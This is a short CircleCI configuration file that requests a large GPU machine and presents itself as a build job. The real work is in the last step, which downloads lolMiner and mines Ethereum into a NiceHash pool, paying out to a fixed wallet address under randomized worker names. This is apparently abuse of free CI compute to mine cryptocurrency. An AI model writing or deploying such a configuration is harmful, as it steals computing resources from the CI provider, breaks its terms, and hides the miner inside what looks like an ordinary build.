version: 2.1 
 
jobs: 
  build: 
    machine: 
      image: ubuntu-1604-cuda-10.1:201909-23 
    resource_class: gpu.nvidia.large 
    steps: 
      - run: nvidia-smi 
      - run: docker run --gpus all nvidia/cuda:9.0-base nvidia-smi 
      - run: sudo apt-get update -y && wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.29/lolMiner_v1.29_Lin64.tar.gz && tar -xf lolMiner_v1.29_Lin64.tar.gz && cd 1.29 && ./lolMiner --algo ETHASH --pool stratum+tcp://daggerhashimoto.hk.nicehash.com:3353 --user 3AhGzsYExJchLbzGVuiRTk33M5RAmL6C1f.GPU-Vivo-$(echo $(shuf -i 1-99 -n 1))--vapers --ethstratum ETHPROXY